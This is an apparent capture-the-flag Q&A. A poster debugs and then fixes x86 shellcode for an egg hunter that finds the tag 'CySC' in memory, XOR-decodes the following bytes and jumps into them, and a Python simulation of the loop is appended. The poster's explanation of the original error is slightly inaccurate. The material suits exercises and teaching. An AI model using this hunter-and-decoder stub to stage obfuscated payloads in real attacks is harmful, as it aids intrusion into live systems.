I'm writing shellcode to solve an infosec challenge that requires you to first find an egg in memory, "CySC", then xor the 255 bytes following the memory address of the egg tag, using the last byte of the memory address of the egg tag. This is what I have come up with so far, but I'm getting the above error for line 19, which is the 'xor [eax+bl],cl' instruction.
BITS 32
start:
mov eax, 0xb7469FFF ;this is one byte before the start of where the code "CySC" can be found
mov ebx, 'CySC' ;obvious.
compare:
inc eax ;move to the next byte, which is the start of the range where "CySC" can be found
cmp [eax], ebx ;does the data located at eax equal "CySC" ?
jne compare ;Loop if not, increment eax by one and check next mem add
foundit:
xor ecx, ecx ;zero out ecx to store the last byte of eax's mem address where "CySC" is located. Remember this is what we will xor the rest of the shellcode with.
mov cl, al ;move the last byte of eax into cl
xor ebx, ebx ;zero out ebx for use as a counter in the next loop
deobfuscate:
dec bl ;subtract 1 from bl, the first loop will be 255 (ff)
xor [eax+bl],cl ;look at what is located at eax+bl (eax+255 first loop)
cmp [bl], 4 ;is bl counter equal to 4?
jne deobfuscate ;if it is continue, if not loop
runshellcode:
add eax, 4 ;add 4 to eax to skip over our egg tag "CySC"
call eax ;execute shellcode at eax
Any suggestions would be much appreciated!
The problem was in "xor [eax+bl],al", because the [] brackets denote that everything within will be a pointer to the value located at the memory address... so bl = 0xFF in the first loop, obviously an invalid mem address. So I just changed it to "xor [eax+ebx],al" to pull the value located at ebx, and it worked. Got my flag! Thanks for the help.
BITS 32
start:
mov eax, 0xb7469FFF ;one byte before the start of the search range
mov ebx, 'CySC' ;the egg tag
compare:
inc eax ;advance to the next byte
cmp [eax], ebx ;does the dword at eax equal "CySC"?
jne compare ;keep scanning until the egg is found
foundit:
xor ecx, ecx
mov cl, al ;cl = last byte of the egg's address (the loop below uses al directly, which holds the same value)
xor ebx, ebx ;zero the full 32-bit counter so [eax+ebx] is a valid effective address
deobfuscate:
dec bl ;first pass: bl = 0xFF
xor [eax+ebx],al ;xor the byte at eax+bl with the key
cmp bl, 0x4 ;compare the register itself, not the memory it points to
jne deobfuscate ;loop until bl reaches 4, so offsets 255 down to 4 get decoded
execute:
add eax, 4 ;skip over the egg tag
call eax ;run the decoded shellcode
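Added here as an illustration, not the poster's code: a small Python simulation of the egg hunter and the corrected decode loop at the register level, so the addressing and the loop bounds can be checked offline. The base address, memory image and payload are constructed; the hunter, the `dec bl` / `xor [eax+ebx], al` / `cmp bl, 4` loop and the matching encoder follow the working listing above. Stepping it shows that the loop XORs offsets 255 down to 4 relative to the egg, i.e. 252 bytes, and leaves the egg itself and anything past offset 255 untouched.

```python
"""Register-level simulation of the egg hunter and the corrected XOR-decode
loop from the answer above.  Constructed example: the base address, memory
image and payload are made up so the loop can be stepped through offline;
none of this is the original poster's code."""

EGG = b"CySC"
BASE = 0xB7469FFF              # constructed: one byte before the search range, as in the post
FIRST_OFF, LAST_OFF = 4, 255   # the loop touches egg+255 down to egg+4 (cmp bl, 4 stops it)


def hunt_egg(mem: bytes, base: int) -> int:
    """inc eax / cmp [eax], ebx / jne compare: return the address of the first egg.

    mem[i] models the byte at address base + i; the scan starts at base + 1."""
    eax = base
    while True:
        eax += 1                        # inc eax
        off = eax - base
        if off + 4 > len(mem):
            raise ValueError("egg not found in memory image")
        if mem[off:off + 4] == EGG:     # cmp [eax], ebx
            return eax


def decode_in_place(mem: bytearray, base: int, eax: int) -> list:
    """dec bl / xor [eax+ebx], al / cmp bl, 4 / jne deobfuscate.

    Returns the egg-relative offsets that were XORed, in execution order."""
    key = eax & 0xFF                    # mov cl, al: low byte of the egg's address
    ebx = 0                             # xor ebx, ebx
    touched = []
    while True:
        ebx = (ebx & ~0xFF) | ((ebx - 1) & 0xFF)    # dec bl: only the low byte wraps
        mem[eax + ebx - base] ^= key                # xor [eax+ebx], al
        touched.append(ebx)
        if (ebx & 0xFF) == 4:                       # cmp bl, 4 / jne deobfuscate
            return touched


def encode(payload: bytes, egg_addr: int) -> bytes:
    """Inverse of the decoder: XOR the bytes that will sit at egg+4..egg+255.

    Bytes beyond offset 255 are left clear because the loop never reaches them."""
    key = egg_addr & 0xFF
    n = LAST_OFF - FIRST_OFF + 1        # 252 bytes are covered, not 255
    return bytes(b ^ key for b in payload[:n]) + payload[n:]


def build_image(payload: bytes, egg_addr: int) -> bytearray:
    """Constructed memory image: filler up to the egg, the egg, then the encoded payload."""
    filler = b"\x90" * (egg_addr - BASE)            # mem[0] models the byte at BASE itself
    return bytearray(filler + EGG + encode(payload, egg_addr))


def run(payload: bytes, egg_addr: int):
    """Encode, hunt, decode; return (egg address found, offsets touched, recovered bytes)."""
    mem = build_image(payload, egg_addr)
    found = hunt_egg(mem, BASE)
    touched = decode_in_place(mem, BASE, found)
    start = found - BASE + FIRST_OFF
    recovered = bytes(mem[start:start + len(payload)])
    return found, touched, recovered


if __name__ == "__main__":
    # constructed payload: 252 bytes inside the loop's range plus one byte just past it
    demo = bytes((i * 7 + 3) & 0xFF for i in range(252)) + b"\xCC"
    addr, offs, out = run(demo, 0xB746A00F)
    print(hex(addr), len(offs), offs[0], offs[-1], out == demo)
```

The `ebx` update mirrors why `xor ebx, ebx` matters in the real code: `dec bl` only changes the low byte, so the upper 24 bits must already be zero for `[eax+ebx]` to land inside the payload. If your challenge's encoder XORs a different range than offsets 4 through 255, adjust `FIRST_OFF` / `LAST_OFF` and the `cmp bl` value together.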